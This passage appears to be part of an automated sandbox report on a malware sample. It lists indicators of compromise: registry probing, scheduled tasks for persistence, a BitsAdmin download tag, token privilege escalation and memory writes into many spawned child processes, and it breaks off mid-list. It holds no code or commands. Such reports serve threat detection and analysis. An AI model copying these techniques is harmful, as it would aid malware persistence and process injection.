\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 6088 schtasks.exe 2232 schtasks.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 42 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU msedge.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 6364 taskkill.exe 5852 taskkill.exe -
Modifies data under HKEY_USERS 44 IoCs
Processes:
sihclient.exesvchost.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\7\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe -
Modifies registry class 20 IoCs
Processes:
VC_redist.x64.exeVC_redist.x86.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle\Dependents VC_redist.x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents\{a8968509-65be-4c09-a460-fd1584b1cdbf} VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer VC_redist.x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle VC_redist.x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle\Version = "14.29.30040.0" VC_redist.x64.exe Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x64) - 14.29.30040" VC_redist.x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\ = "{a8968509-65be-4c09-a460-fd1584b1cdbf}" VC_redist.x86.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Dependents VC_redist.x86.exe Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\Software\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle VC_redist.x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies VC_redist.x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle\ = "{5c6cccca-61ec-4667-a8d9-e133a59a5a73}" VC_redist.x64.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x64,amd64,14.29,bundle\Dependents\{5c6cccca-61ec-4667-a8d9-e133a59a5a73} VC_redist.x64.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\Version = "14.29.30040.0" VC_redist.x86.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Dependencies\VC,redist.x86,x86,14.29,bundle\DisplayName = "Microsoft Visual C++ 2015-2019 Redistributable (x86) - 14.29.30040" VC_redist.x86.exe -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 110 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 114 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
375C1FFE19F2FBA6FF5F32B4000CDEA4.exe1P2iyh2JidvGFh4oERonoUp_.exeWerFault.exerunvd.exewtASthkTL07xVBxtjE9a02tm.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepowershell.exepid process 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 4196 1P2iyh2JidvGFh4oERonoUp_.exe 1796 WerFault.exe 1796 WerFault.exe 4716 runvd.exe 4716 runvd.exe 4580 wtASthkTL07xVBxtjE9a02tm.exe 4580 wtASthkTL07xVBxtjE9a02tm.exe 1696 WerFault.exe 1696 WerFault.exe 4436 WerFault.exe 4436 WerFault.exe 3988 WerFault.exe 3988 WerFault.exe 3100 3100 3100 3100 1364 WerFault.exe 1364 WerFault.exe 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 1980 WerFault.exe 1980 WerFault.exe 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 3100 4164 powershell.exe 4164 powershell.exe 3100 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3100 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
wtASthkTL07xVBxtjE9a02tm.exepid process 4580 wtASthkTL07xVBxtjE9a02tm.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
1U9482xac9Vdw81qeLADoS78.exe49G7lSDL36pm6Tf9CJu2K920.exeWerFault.exevri9QJNUrvtCCtcp5iTLexaq.exe8HEOXyIuppRBNR0NhZp_MAyf.exeKbRivSLWxMXy_7RFr0zzm9xk.exeXLKr7Gg3jXYqn3Cb0v5ROYaS.exepowershell.exevssvc.exeaskinstall53.exedescription pid process Token: SeDebugPrivilege 4968 1U9482xac9Vdw81qeLADoS78.exe Token: SeDebugPrivilege 4112 49G7lSDL36pm6Tf9CJu2K920.exe Token: SeRestorePrivilege 1796 WerFault.exe Token: SeBackupPrivilege 1796 WerFault.exe Token: SeBackupPrivilege 1796 WerFault.exe Token: SeDebugPrivilege 1064 vri9QJNUrvtCCtcp5iTLexaq.exe Token: SeDebugPrivilege 4956 8HEOXyIuppRBNR0NhZp_MAyf.exe Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeDebugPrivilege 3800 KbRivSLWxMXy_7RFr0zzm9xk.exe Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeDebugPrivilege 488 XLKr7Gg3jXYqn3Cb0v5ROYaS.exe Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeDebugPrivilege 4164 powershell.exe Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeBackupPrivilege 2980 vssvc.exe Token: SeRestorePrivilege 2980 vssvc.exe Token: SeAuditPrivilege 2980 vssvc.exe Token: SeShutdownPrivilege 3100 Token: SeCreatePagefilePrivilege 3100 Token: SeCreateTokenPrivilege 1072 askinstall53.exe Token: SeAssignPrimaryTokenPrivilege 1072 askinstall53.exe Token: SeLockMemoryPrivilege 1072 askinstall53.exe Token: SeIncreaseQuotaPrivilege 1072 askinstall53.exe Token: SeMachineAccountPrivilege 1072 askinstall53.exe Token: SeTcbPrivilege 1072 askinstall53.exe Token: SeSecurityPrivilege 1072 askinstall53.exe Token: SeTakeOwnershipPrivilege 1072 askinstall53.exe Token: SeLoadDriverPrivilege 1072 askinstall53.exe Token: SeSystemProfilePrivilege 1072 askinstall53.exe Token: SeSystemtimePrivilege 1072 askinstall53.exe Token: SeProfSingleProcessPrivilege 1072 askinstall53.exe Token: SeIncBasePriorityPrivilege 1072 askinstall53.exe Token: SeCreatePagefilePrivilege 1072 askinstall53.exe Token: SeCreatePermanentPrivilege 1072 askinstall53.exe Token: SeBackupPrivilege 1072 askinstall53.exe Token: SeRestorePrivilege 1072 askinstall53.exe Token: SeShutdownPrivilege 1072 askinstall53.exe Token: SeDebugPrivilege 1072 askinstall53.exe Token: SeAuditPrivilege 1072 askinstall53.exe Token: SeSystemEnvironmentPrivilege 1072 askinstall53.exe Token: SeChangeNotifyPrivilege 1072 askinstall53.exe Token: SeRemoteShutdownPrivilege 1072 askinstall53.exe Token: SeUndockPrivilege 1072 askinstall53.exe Token: SeSyncAgentPrivilege 1072 askinstall53.exe Token: SeEnableDelegationPrivilege 1072 askinstall53.exe Token: SeManageVolumePrivilege 1072 askinstall53.exe -
Suspicious use of FindShellTrayWindow 7 IoCs
Processes:
8EiYpKhDEcXgXVlhx5Kwkd8q.tmpCleaner Installation.exeultramediaburner.tmpinstaller.exemsedge.exeCleaner.exemsedge.exepid process 4204 8EiYpKhDEcXgXVlhx5Kwkd8q.tmp 3708 Cleaner Installation.exe 656 ultramediaburner.tmp 2004 installer.exe 4716 msedge.exe 3268 Cleaner.exe 2804 msedge.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
cmd.execmd.exepid process 3884 cmd.exe 7108 cmd.exe -
Suspicious use of UnmapMainImage 1 IoCs
Processes:
pid process 3100 -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
375C1FFE19F2FBA6FF5F32B4000CDEA4.exedescription pid process target process PID 4736 wrote to memory of 5008 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe KpjOE9plqshxTez0Y9Dq5Tb5.exe PID 4736 wrote to memory of 5008 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe KpjOE9plqshxTez0Y9Dq5Tb5.exe PID 4736 wrote to memory of 4956 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 8HEOXyIuppRBNR0NhZp_MAyf.exe PID 4736 wrote to memory of 4956 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 8HEOXyIuppRBNR0NhZp_MAyf.exe PID 4736 wrote to memory of 4956 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 8HEOXyIuppRBNR0NhZp_MAyf.exe PID 4736 wrote to memory of 3876 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wtASthkTL07xVBxtjE9a02tm.exe PID 4736 wrote to memory of 3876 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wtASthkTL07xVBxtjE9a02tm.exe PID 4736 wrote to memory of 3876 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe wtASthkTL07xVBxtjE9a02tm.exe PID 4736 wrote to memory of 840 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe iRqjX4A5YnqgK2YsIoMgdSoD.exe PID 4736 wrote to memory of 840 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe iRqjX4A5YnqgK2YsIoMgdSoD.exe PID 4736 wrote to memory of 840 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe iRqjX4A5YnqgK2YsIoMgdSoD.exe PID 4736 wrote to memory of 836 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe EZrtSzAMJQfXsQrLCzQybKjh.exe PID 4736 wrote to memory of 836 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe EZrtSzAMJQfXsQrLCzQybKjh.exe PID 4736 wrote to memory of 836 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe EZrtSzAMJQfXsQrLCzQybKjh.exe PID 4736 wrote to memory of 4112 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 49G7lSDL36pm6Tf9CJu2K920.exe PID 4736 wrote to memory of 4112 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 49G7lSDL36pm6Tf9CJu2K920.exe PID 4736 wrote to memory of 4796 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe TmkGCvXufEjdq7bBSflS1DJU.exe PID 4736 wrote to memory of 4796 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe TmkGCvXufEjdq7bBSflS1DJU.exe PID 4736 wrote to memory of 4796 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe TmkGCvXufEjdq7bBSflS1DJU.exe PID 4736 wrote to memory of 656 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe VjGNJYTkssviPnxpDIwNcfng.exe PID 4736 wrote to memory of 656 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe VjGNJYTkssviPnxpDIwNcfng.exe PID 4736 wrote to memory of 656 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe VjGNJYTkssviPnxpDIwNcfng.exe PID 4736 wrote to memory of 4456 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1NpraAWhj4kgz1ajLCCVpFRf.exe PID 4736 wrote to memory of 4456 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1NpraAWhj4kgz1ajLCCVpFRf.exe PID 4736 wrote to memory of 4456 4736 375C1FFE19F2FBA6FF5F32B4000CDEA4.exe 1NpraAWhj4kgz1ajLCCVpFRf.exe PID 4736 wrote to memory of 572 4736 